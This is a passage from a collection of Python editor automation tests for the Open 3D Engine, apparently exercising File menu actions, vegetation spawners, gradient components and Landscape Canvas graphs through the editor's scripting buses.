editor_python_test_tools.pyside_utils as pyside_utils class TestFileMenuOptions(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="file_menu_options: ", args=["level"]) def run_test(self): """ Summary: Interact with File Menu options and verify if all the options are working. Expected Behavior: The File menu functions normally. Test Steps: 1) Open level 2) Interact with File Menu options Note: - This test file must be called from the Lumberyard Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. 
:return: None """ file_menu_options = [ ("New Level",), ("Open Level",), ("Import",), ("Save",), ("Save As",), ("Save Level Statistics",), ("Edit Project Settings",), ("Edit Platform Settings",), ("New Project",), ("Open Project",), ("Show Log File",), ("Resave All Slices",), ("Exit",), ] # 1) Open level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) def on_action_triggered(action_name): print(f"{action_name} Action triggered") # 2) Interact with File Menu options try: editor_window = pyside_utils.get_editor_main_window() for option in file_menu_options: action = pyside_utils.get_action_for_menu_path(editor_window, "File", *option) trig_func = lambda: on_action_triggered(action.iconText()) action.triggered.connect(trig_func) action.trigger() action.triggered.disconnect(trig_func) except Exception as e: self.test_success = False print(e) test = TestFileMenuOptions() test.run() ``` #### File: PythonTests/EditorPythonBindings/ComponentPropertyCommands_test.py ```python import pytest pytest.importorskip('ly_test_tools') import sys import os sys.path.append(os.path.dirname(__file__)) from hydra_utils import launch_test_case @pytest.mark.SUITE_sandbox @pytest.mark.parametrize('launcher_platform', ['windows_editor']) @pytest.mark.parametrize('project', ['AutomatedTesting']) @pytest.mark.parametrize('level', ['Simple']) class TestGradientRequiresShape(object): @pytest.mark.skip # SPEC-4102 def test_ComponentProperty(self, request, editor, level, launcher_platform): unexpected_lines=[] expected_lines = [ "New entity with no parent created", "Environment Probe component added to entity", "Entity has an Environment Probe component", "get_paths_list works", "GetSetCompareTest Settings|General Settings|Visible: SUCCESS", "GetSetCompareTest Settings|Animation|Style: SUCCESS", "GetSetCompareTest Settings|Environment Probe Settings|Box height: SUCCESS", "GetSetCompareTest Settings|General Settings|Color: SUCCESS", "GetSetCompareTest Settings|Environment Probe Settings|Area dimensions: SUCCESS", "PteTest Settings|General Settings|Visible: SUCCESS", "PteTest Settings|Animation|Style: SUCCESS", "PteTest Settings|Environment Probe Settings|Box height: SUCCESS", "PteTest Settings|General Settings|Color: SUCCESS", "PteTest Settings|Environment Probe Settings|Area dimensions: SUCCESS", ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_case.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # SPEC-4102 def test_SetDistance_Between_FilterBound_Mode(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "New entity with no parent created: SUCCESS", "Components added to entity: SUCCESS", "Found Vegetation Distance Between Filter: SUCCESS", "CompareComponentProperty - Configuration|Bound Mode: SUCCESS", "GetSetCompareTest - Configuration|Bound Mode: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_enum.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # LYN-1951 def test_PropertyTreeVisibility(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "oceanEntityId was found: SUCCESS", "Found Infinite Ocean component ID: SUCCESS", "Created a PropertyTreeEditor for the infiniteOceanId: 
SUCCESS", "Found proprety hidden node in path: SUCCESS", "Proprety node is now a hidden path: SUCCESS", "Property path enforcement of visibility: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_case_visibility.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # SPEC-4102 def test_PropertyContainerOpeartions(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "New entity with no parent created: SUCCESS", "GradientSurfaceDataComponent added to entity :SUCCESS", "Has zero items: SUCCESS", "Add an item 0: SUCCESS", "Has one item 0: SUCCESS", "Add an item 1: SUCCESS", "Add an item 2: SUCCESS", "Add an item 3: SUCCESS", "Has four items: SUCCESS", "Updated an item: SUCCESS", "itemTag equals tagFour: SUCCESS", "Removed one item 0: SUCCESS", "Removed one item 1: SUCCESS", "Has two items: SUCCESS", "Reset items: SUCCESS", "Has cleared the items: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_containers.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) @pytest.mark.skip # LYN-1951 def test_PropertyContainerOpeartionWithNone(self, request, editor, level, launcher_platform): unexpected_lines = ['FAILURE', 'script failure'] expected_lines = [ "material current is valid - True: SUCCESS", "material set to None: SUCCESS", "material has been set to None: SUCCESS" ] test_case_file = os.path.join(os.path.dirname(__file__), 'ComponentPropertyCommands_test_case_set_none.py') launch_test_case(editor, test_case_file, expected_lines, unexpected_lines) ``` #### File: PythonTests/EditorPythonBindings/PySide_Example_test_case.py ```python import sys import os import PySide2 sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../automatedtesting_shared') import azlmbr.bus as bus import azlmbr.entity as entity import azlmbr.editor as editor import azlmbr.legacy.general as general import editor_python_test_tools.pyside_component_utils as pysde_component_utils def PySide_Example_test_case(): # Open level, any level should work editor.EditorToolsApplicationRequestBus(bus.Broadcast, 'OpenLevelNoPrompt', os.path.join('WhiteBox', 'EmptyLevel')) entityId = editor.ToolsApplicationRequestBus(bus.Broadcast, 'CreateNewEntity', entity.EntityId()) if entityId: print('New entity with no parent created') # Get Component Type for Environment Probe and attach to entity typeIdsList = editor.EditorComponentAPIBus(bus.Broadcast, 'FindComponentTypeIdsByEntityType', ["Environment Probe"], entity.EntityType().Game) componentOutcome = editor.EditorComponentAPIBus(bus.Broadcast, 'AddComponentsOfType', entityId, typeIdsList) if componentOutcome.IsSuccess(): print('Environment Probe component added to entity') # Waiting for one frame so that the widgets in the UI are updated with the new component information general.idle_enable(True) general.idle_wait_frames(1) values = pyside_component_utils.get_component_combobox_values('Environment Probe', 'Resolution', print) if values: print(f'ComboBox Values retrieved: {values}.') else: print('Could not retrieve ComboBox values') editor.EditorToolsApplicationRequestBus(bus.Broadcast, 'ExitNoPrompt') if __name__ == '__main__': PySide_Example_test_case() ``` #### File: dyn_veg/EditorScripts/DistanceBetweenFilter_InstancesPlantAtSpecifiedRadius.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import 
azlmbr.editor as editor import azlmbr.legacy.general as general import azlmbr.bus as bus import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper from largeworlds.large_worlds_utils import editor_dynveg_test_helper as dynveg class TestDistanceBetweenFilterComponent(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="DistanceBetweenFilterComponent", args=["level"]) def run_test(self): """ Summary: Creates a level with a simple vegetation area. A Vegetation Distance Between Filter is added and the min radius is changed. Instance counts at specific points are validated. Test Steps: 1) Create a new level 2) Create a vegetation area 3) Create a surface for planting 4) Add the Vegetation System Settings component and setup for the test 5-8) Add the Distance Between Filter, and validate expected instance counts with a few different Radius values Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ instance_query_point_a = math.Vector3(512.5, 512.5, 32.0) instance_query_point_b = math.Vector3(514.0, 512.5, 32.0) instance_query_point_c = math.Vector3(515.0, 512.5, 32.0) # 1) Create a new, temporary level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) general.set_current_view_position(512.0, 480.0, 38.0) # 2) Create a new entity with required vegetation area components spawner_center_point = math.Vector3(520.0, 520.0, 32.0) asset_path = os.path.join("Slices", "1m_cube.dynamicslice") spawner_entity = dynveg.create_vegetation_area("Instance Spawner", spawner_center_point, 16.0, 16.0, 16.0, asset_path) # 3) Create a surface to plant on surface_center_point = math.Vector3(512.0, 512.0, 32.0) dynveg.create_surface_entity("Planting Surface", surface_center_point, 128.0, 128.0, 1.0) # 4) Add a Vegetation System Settings Level component and set Sector Point Snap Mode to Center veg_system_settings_component = hydra.add_level_component("Vegetation System Settings") editor.EditorComponentAPIBus(bus.Broadcast, "SetComponentProperty", veg_system_settings_component, 'Configuration|Area System Settings|Sector Point Snap Mode', 1) editor.EditorComponentAPIBus(bus.Broadcast, "SetComponentProperty", veg_system_settings_component, 'Configuration|Area System Settings|Sector Point Density', 16) # 5) Add a Vegetation Distance Between Filter and verify initial instance counts are accurate spawner_entity.add_component("Vegetation Distance Between Filter") num_expected = 16 * 16 num_expected = 16 * 16 initial_success = self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected), 5.0) self.test_success = self.test_success and initial_success # 6) Change Radius Min to 1.0, refresh, and verify instance counts are accurate spawner_entity.get_set_test(3, "Configuration|Radius Min", 1.0) point_a_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_a, 0.5, 1), 5.0) point_b_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_b, 0.5, 0), 
5.0) point_c_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_c, 0.5, 1), 5.0) self.test_success = self.test_success and point_a_success and point_b_success and point_c_success # 7) Change Radius Min to 2.0, refresh, and verify instance counts are accurate spawner_entity.get_set_test(3, "Configuration|Radius Min", 2.0) point_a_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_a, 0.5, 1), 5.0) point_b_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_b, 0.5, 0), 5.0) point_c_success = self.wait_for_condition(lambda: dynveg.validate_instance_count(instance_query_point_c, 0.5, 0), 5.0) self.test_success = self.test_success and point_a_success and point_b_success and point_c_success # 8) Change Radius Min to 16.0, refresh, and verify instance counts are accurate spawner_entity.get_set_test(3, "Configuration|Radius Min", 16.0) num_expected_instances = 1 final_check_success = self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = final_check_success and self.test_success test = TestDistanceBetweenFilterComponent() test.run() ``` #### File: dyn_veg/EditorScripts/DynamicSliceInstanceSpawner_DynamicSliceSpawnerWorks.py ```python import os import sys import azlmbr.legacy.general as general import azlmbr.bus as bus import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper from largeworlds.large_worlds_utils import editor_dynveg_test_helper as dynveg class TestDynamicSliceInstanceSpawner(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="DynamicSliceInstanceSpawner", args=["level"]) def run_test(self): """ Summary: Test aspects of the DynamicSliceInstanceSpawner through the BehaviorContext and the Property Tree. :return: None """ # 1) Open an empty level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) general.idle_wait(1.0) general.set_current_view_position(512.0, 480.0, 38.0) # Grab the UUID that we need for creating an Dynamic Slice Instance Spawner dynamic_slice_spawner_uuid = azlmbr.math.Uuid_CreateString('{BBA5CC1E-B4CA-4792-89F7-93711E98FBD1}', 0) # Grab a path to a test dynamic slice asset test_slice_asset_path = os.path.join("Slices", "PinkFlower.dynamicslice") # 2) Test DynamicSliceInstanceSpawner BehaviorContext behavior_context_test_success = True dynamic_slice_spawner = azlmbr.vegetation.DynamicSliceInstanceSpawner() behavior_context_test_success = behavior_context_test_success and (dynamic_slice_spawner is not None) behavior_context_test_success = behavior_context_test_success and (dynamic_slice_spawner.typename == 'DynamicSliceInstanceSpawner') # Try to get/set the slice asset path with a valid asset dynamic_slice_spawner.SetSliceAssetPath(test_slice_asset_path) validate_path = dynamic_slice_spawner.GetSliceAssetPath() # We expect the path to get lowercased and normalized with a forward slash, so we compare our result # vs that instead of directly against test_slice_asset_path. 
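        # (For example, the asset path built above with os.path.join("Slices", "PinkFlower.dynamicslice") is
        # expected to come back from GetSliceAssetPath() as "slices/pinkflower.dynamicslice".)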
behavior_context_test_success = behavior_context_test_success and hydra.compare_values('slices/pinkflower.dynamicslice', validate_path, 'GetSliceAssetPath - valid') # Try to get/set the slice asset path with an empty path dynamic_slice_spawner.SetSliceAssetPath('') validate_path = dynamic_slice_spawner.GetSliceAssetPath() behavior_context_test_success = behavior_context_test_success and hydra.compare_values('', validate_path, 'GetSliceAssetPath - empty') self.test_success = self.test_success and behavior_context_test_success self.log(f'DynamicSliceInstanceSpawner() BehaviorContext test: {behavior_context_test_success}') # 3) Test Descriptor BehaviorContext - setting spawnerType sets spawner too spawner_type_test_success = True descriptor = azlmbr.vegetation.Descriptor() spawner_type_test_success = spawner_type_test_success and hydra.get_set_property_test(descriptor, 'spawnerType', dynamic_slice_spawner_uuid) spawner_type_test_success = spawner_type_test_success and (descriptor.spawner.typename == 'DynamicSliceInstanceSpawner') self.test_success = self.test_success and spawner_type_test_success self.log(f'Descriptor() BehaviorContext spawnerType test: {spawner_type_test_success}') # 4) Test Descriptor BehaviorContext - setting spawner sets spawnerType too spawner_test_success = True descriptor = azlmbr.vegetation.Descriptor() descriptor.spawner = dynamic_slice_spawner spawner_test_success = spawner_test_success and (descriptor.spawnerType.Equal(dynamic_slice_spawner_uuid)) spawner_test_success = spawner_test_success and (descriptor.spawner.typename == 'DynamicSliceInstanceSpawner') self.test_success = self.test_success and spawner_test_success self.log(f'Descriptor() BehaviorContext spawner test: {spawner_test_success}') ### Setup for Property Tree set of tests # Create a new entity with required vegetation area components spawner_entity = hydra.Entity("Veg Area") spawner_entity.create_entity( math.Vector3(512.0, 512.0, 32.0), ["Vegetation Layer Spawner", "Box Shape", "Vegetation Asset List"] ) if (spawner_entity.id.IsValid()): self.log(f"'{spawner_entity.name}' created") # Resize the Box Shape component new_box_dimensions = math.Vector3(16.0, 16.0, 16.0) box_dimensions_path = "Box Shape|Box Configuration|Dimensions" spawner_entity.get_set_test(1, box_dimensions_path, new_box_dimensions) # Create a surface to plant on dynveg.create_surface_entity("Surface Entity", math.Vector3(512.0, 512.0, 32.0), 1024.0, 1024.0, 1.0) # 5) Descriptor Property Tree test: spawner type can be set # - Validate the dynamic slice spawner type can be set correctly. 
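        # (get_set_test's first argument is an index into spawner_entity.components; index 2 is the
        # Vegetation Asset List component added when the entity was created above.)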
property_tree_success = True property_tree_success = property_tree_success and spawner_entity.get_set_test(2, 'Configuration|Embedded Assets|[0]|Instance Spawner', dynamic_slice_spawner_uuid) # This should result in 400 instances, since our box is 16 m x 16 m and by default the veg system plants # 20 instances per 16 meters spawner_entity.get_set_test(0, 'Configuration|Allow Empty Assets', True) num_expected_instances = 20 * 20 property_tree_success = property_tree_success and self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = self.test_success and property_tree_success self.log(f'Property Tree spawner type test: {property_tree_success}') # 6) Validate that the "Allow Empty Assets" setting affects the DynamicSliceInstanceSpawner allow_empty_assets_success = True # Since we have an empty slice path, we should have 0 instances once we disable 'Allow Empty Assets' num_expected_instances = 0 allow_empty_assets_success = allow_empty_assets_success and spawner_entity.get_set_test(0, 'Configuration|Allow Empty Assets', False) self.log('Allow Empty Assets test:') allow_empty_assets_success = allow_empty_assets_success and self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = self.test_success and allow_empty_assets_success self.log(f'Allow Empty Assets test: {allow_empty_assets_success}') # 7) Validate that with 'Allow Empty Assets' set to False, a non-empty slice asset gives us the number # of instances we expect. spawns_slices_success = True num_expected_instances = 20 * 20 dynamic_slice_spawner.SetSliceAssetPath(test_slice_asset_path) spawns_slices_success = spawns_slices_success and spawner_entity.get_set_test(0, 'Configuration|Allow Empty Assets', False) descriptor = hydra.get_component_property_value(spawner_entity.components[2], 'Configuration|Embedded Assets|[0]') descriptor.spawner = dynamic_slice_spawner spawns_slices_success = spawns_slices_success and spawner_entity.get_set_test(2, "Configuration|Embedded Assets|[0]", descriptor) self.log('Spawn dynamic slices test:') spawns_slices_success = spawns_slices_success and self.wait_for_condition(lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected_instances), 5.0) self.test_success = self.test_success and spawns_slices_success self.log(f'Spawn dynamic slices test: {spawns_slices_success}') test = TestDynamicSliceInstanceSpawner() test.run() ``` #### File: dyn_veg/EditorScripts/MeshSurfaceTagEmitter_DependentOnMeshComponent.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.bus as bus import azlmbr.editor as editor import azlmbr.entity as EntityId import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper class TestMeshSurfaceTagEmitter(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="MeshSurfaceTagEmitter_DependentOnMeshComponent", args=["level"]) def run_test(self): """ Summary: A New level is loaded. A New entity is created with component "Mesh Surface Tag Emitter". Adding a component "Mesh" to the same entity. 
Expected Behavior: Mesh Surface Tag Emitter is disabled until the required Mesh component is added to the entity. Test Steps: 1) Open level 2) Create a new entity with component "Mesh Surface Tag Emitter" 3) Make sure Mesh Surface Tag Emitter is disabled 4) Add Mesh to the same entity 5) Make sure Mesh Surface Tag Emitter is enabled after adding Mesh Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ def is_component_enabled(EntityComponentIdPair): return editor.EditorComponentAPIBus(bus.Broadcast, "IsComponentEnabled", EntityComponentIdPair) # 1) Open level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) # 2) Create a new entity with component "Mesh Surface Tag Emitter" entity_position = math.Vector3(125.0, 136.0, 32.0) component_to_add = "Mesh Surface Tag Emitter" entity_id = editor.ToolsApplicationRequestBus( bus.Broadcast, "CreateNewEntityAtPosition", entity_position, EntityId.EntityId() ) meshentity = hydra.Entity("meshentity", entity_id) meshentity.components = [] meshentity.components.append(hydra.add_component(component_to_add, entity_id)) if entity_id.IsValid(): print("New Entity Created") # 3) Make sure Mesh Surface Tag Emitter is disabled is_enabled = is_component_enabled(meshentity.components[0]) self.test_success = self.test_success and not is_enabled if not is_enabled: print(f"{component_to_add} is Disabled") elif is_enabled: print(f"{component_to_add} is Enabled. But It should be disabled before adding Mesh") # 4) Add Mesh to the same entity component = "Mesh" meshentity.components.append(hydra.add_component(component, entity_id)) # 5) Make sure Mesh Surface Tag Emitter is enabled after adding Mesh is_enabled = is_component_enabled(meshentity.components[0]) self.test_success = self.test_success and is_enabled if is_enabled: print(f"{component_to_add} is Enabled") elif not is_enabled: print(f"{component_to_add} is Disabled. But It should be enabled after adding Mesh") test = TestMeshSurfaceTagEmitter() test.run() ``` #### File: dyn_veg/EditorScripts/ScaleModifierOverrides_InstancesProperlyScale.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.areasystem as areasystem import azlmbr.bus as bus import azlmbr.legacy.general as general import azlmbr.math as math sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper from largeworlds.large_worlds_utils import editor_dynveg_test_helper as dynveg # Constants CLOSE_ENOUGH_THRESHOLD = 0.01 class TestScaleModifierOverrides_InstancesProperlyScale(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="ScaleModifierOverrides_InstancesProperlyScale", args=["level"]) def run_test(self): """ Summary: A level is created, then as simple vegetation area is created. Vegetation Scale Modifier component is added to the vegetation area. A new child entity is created with Random Noise Gradient Generator, Gradient Transform Modifier, and Box Shape. 
Child entity is set as gradient entity id in Vegetation Scale Modifier, and scale of instances is validated to fall within expected range. Expected Behavior: Vegetation instances have random scale between Range Min and Range Max applied. Test Steps: 1) Create level 2) Create a new entity with components "Vegetation Layer Spawner", "Vegetation Asset List", "Box Shape" 3) Set a valid mesh asset on the Vegetation Asset List 4) Add Vegetation Scale Modifier component to the vegetation and set the values 5) Toggle on Scale Modifier Override and verify Scale Min and Scale Max are set 0.1 and 1.0 6) Create a new child entity and add components 7) Add child entity as gradient entity id in Vegetation Scale Modifier 8) Validate scale of instances with a few different min/max override values Note: - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ def set_and_validate_scale(entity, min_scale, max_scale): # Set Range Min/Max entity.get_set_test(2, "Configuration|Embedded Assets|[0]|Scale Modifier|Min", min_scale) entity.get_set_test(2, "Configuration|Embedded Assets|[0]|Scale Modifier|Max", max_scale) # Clear all areas to force a refresh general.run_console('veg_debugClearAllAreas') # Wait for instances to spawn num_expected = 20 * 20 self.test_success = self.test_success and self.wait_for_condition( lambda: dynveg.validate_instance_count_in_entity_shape(spawner_entity.id, num_expected), 5.0) # Validate scale values of instances box = azlmbr.shape.ShapeComponentRequestsBus(bus.Event, 'GetEncompassingAabb', entity.id) instances = areasystem.AreaSystemRequestBus(bus.Broadcast, 'GetInstancesInAabb', box) if len(instances) == num_expected: for instance in instances: if min_scale <= instance.scale <= max_scale: self.log("All instances scaled within appropriate range") return True self.log(f"Instance at {instance.position} scale is {instance.scale}. Expected between " f"{min_scale}/{max_scale}") return False self.log(f"Failed to find all instances! 
Found {len(instances)}, expected {num_expected}.") return False # 1) Create level and set an appropriate view of spawner area self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) general.set_current_view_position(500.49, 498.69, 46.66) general.set_current_view_rotation(-42.05, 0.00, -36.33) # 2) Create a new entity with components "Vegetation Layer Spawner", "Vegetation Asset List", "Box Shape" entity_position = math.Vector3(512.0, 512.0, 32.0) asset_path = os.path.join("Slices", "PurpleFlower.dynamicslice") spawner_entity = dynveg.create_vegetation_area("Spawner Entity", entity_position, 16.0, 16.0, 10.0, asset_path) # Create a surface to plant on and add a Vegetation Debugger Level component to allow refreshes dynveg.create_surface_entity("Surface Entity", entity_position, 20.0, 20.0, 1.0) hydra.add_level_component("Vegetation Debugger") # 4) Add Vegetation Scale Modifier component to the vegetation and set the values spawner_entity.add_component("Vegetation Scale Modifier") spawner_entity.get_set_test(3, "Configuration|Allow Per-Item Overrides", True) # 5) Toggle on Scale Modifier Override and verify Scale Min and Scale Max are set 0.1 and 1.0 spawner_entity.get_set_test(2, "Configuration|Embedded Assets|[0]|Scale Modifier|Override Enabled", True) scale_min = float( format( ( hydra.get_component_property_value( spawner_entity.components[2], "Configuration|Embedded Assets|[0]|Scale Modifier|Min" ) ), ".1f", ) ) scale_max = float( format( ( hydra.get_component_property_value( spawner_entity.components[2], "Configuration|Embedded Assets|[0]|Scale Modifier|Max" ) ), ".1f", ) ) if ((scale_max - 1.0) < CLOSE_ENOUGH_THRESHOLD) and ((scale_min - 0.1) < CLOSE_ENOUGH_THRESHOLD): self.log("Scale Min and Scale Max are set to 0.1 and 1.0 in Vegetation Asset List") else: self.log("Scale Min and Scale Max are not set to 0.1 and 1.0 in Vegetation Asset List") # 6) Create a new child entity and add components gradient_entity = hydra.Entity("Gradient Entity") gradient_entity.create_entity( entity_position, ["Random Noise Gradient", "Gradient Transform Modifier", "Box Shape"], parent_id=spawner_entity.id ) if gradient_entity.id.IsValid(): self.log(f"'{gradient_entity.name}' created") # 7) Add child entity as gradient entity id in Vegetation Scale Modifier spawner_entity.get_set_test(3, "Configuration|Gradient|Gradient Entity Id", gradient_entity.id) # 8) Validate instances are scaled properly via a few different Range Min/Max settings on the override self.test_success = set_and_validate_scale(spawner_entity, 0.1, 1.0) and self.test_success self.test_success = set_and_validate_scale(spawner_entity, 2.0, 2.5) and self.test_success self.test_success = set_and_validate_scale(spawner_entity, 1.0, 5.0) and self.test_success test = TestScaleModifierOverrides_InstancesProperlyScale() test.run() ``` #### File: gradient_signal/EditorScripts/GradientTransform_FrequencyZoomCanBeSetBeyondSliderRange.py ```python import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.bus as bus import azlmbr.editor as editor import azlmbr.math as math import azlmbr.paths import azlmbr.entity as EntityId sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper class 
TestGradientTransformFrequencyZoom(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="GradientTransform_FrequencyZoomBeyondSliders", args=["level"]) def run_test(self): """ Summary: Frequency Zoom can manually be set higher than 8 in a random noise gradient Expected Behavior: The value properly changes, despite the value being outside of the slider limit Test Steps: 1) Open level 2) Create entity 3) Add components to the entity 4) Set the frequency value of the component 5) Verify if the frequency value is set to higher value Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # 1) Open level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) # 2) Create entity entity_position = math.Vector3(125.0, 136.0, 32.0) entity_id = editor.ToolsApplicationRequestBus( bus.Broadcast, "CreateNewEntityAtPosition", entity_position, EntityId.EntityId() ) if entity_id.IsValid(): print("Entity Created") # 3) Add components to the entity components_to_add = ["Random Noise Gradient", "Gradient Transform Modifier", "Box Shape"] entity = hydra.Entity("entity", entity_id) entity.components = [] for component in components_to_add: entity.components.append(hydra.add_component(component, entity_id)) print("Components added to the entity") # 4) Set the frequency value of the component hydra.get_set_test(entity, 1, "Configuration|Frequency Zoom", 10) # 5) Verify if the frequency value is set to higher value curr_value = hydra.get_component_property_value(entity.components[1], "Configuration|Frequency Zoom") if curr_value == 10.0: print("Frequency Zoom is equal to expected value") else: print("Frequency Zoom is not equal to expected value") test = TestGradientTransformFrequencyZoom() test.run() ``` #### File: landscape_canvas/EditorScripts/GraphClosed_TabbedGraph.py ```python import os import sys import azlmbr.bus as bus import azlmbr.editor.graph as graph import azlmbr.legacy.general as general import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) from editor_python_test_tools.editor_test_helper import EditorTestHelper editorId = azlmbr.globals.property.LANDSCAPE_CANVAS_EDITOR_ID class TestGraphClosedTabbedGraph(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="GraphClosedTabbedGraph", args=["level"]) def run_test(self): """ Summary: This test verifies that Landscape Canvas tabbed graphs can be independently closed. Expected Behavior: Closing a tabbed graph only closes the appropriate graph. Test Steps: 1) Create a new level 2) Open Landscape Canvas and create several new graphs 3) Close one of the open graphs 4) Ensure the graph properly closed, and other open graphs remain open Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. 
:return: None """ # Create a new empty level self.test_success = self.create_level( self.args["level"], heightmap_resolution=128, heightmap_meters_per_pixel=1, terrain_texture_resolution=128, use_terrain=False, ) # Open Landscape Canvas tool and verify general.open_pane('Landscape Canvas') self.test_success = self.test_success and general.is_pane_visible('Landscape Canvas') if general.is_pane_visible('Landscape Canvas'): self.log('Landscape Canvas pane is open') # Create 3 new graphs in Landscape Canvas newGraphId = graph.AssetEditorRequestBus(bus.Event, 'CreateNewGraph', editorId) self.test_success = self.test_success and newGraphId if newGraphId: self.log("New graph created") newGraphId2 = graph.AssetEditorRequestBus(bus.Event, 'CreateNewGraph', editorId) self.test_success = self.test_success and newGraphId2 if newGraphId2: self.log("2nd new graph created") newGraphId3 = graph.AssetEditorRequestBus(bus.Event, 'CreateNewGraph', editorId) self.test_success = self.test_success and newGraphId3 if newGraphId3: self.log("3rd new graph created") # Make sure the graphs we created are open in Landscape Canvas success = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId) success2 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId2) success3 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId3) self.test_success = self.test_success and success and success2 and success3 if success and success2 and success3: self.log("Graphs registered with Landscape Canvas") # Close a single graph and verify it was properly closed and other graphs remain open success4 = graph.AssetEditorRequestBus(bus.Event, 'CloseGraph', editorId, newGraphId2) success = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId) success2 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId2) success3 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId3) self.test_success = self.test_success and success and success3 and success4 and not success2 if success and success3 and success4 and not success2: self.log("Graph 2 was successfully closed") test = TestGraphClosedTabbedGraph() test.run() ``` #### File: largeworlds/landscape_canvas/test_GraphComponentSync.py ```python import os import pytest # Bail on the test if ly_test_tools doesn't exist. 
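# importorskip imports the module when it is available and otherwise marks every test collected from this
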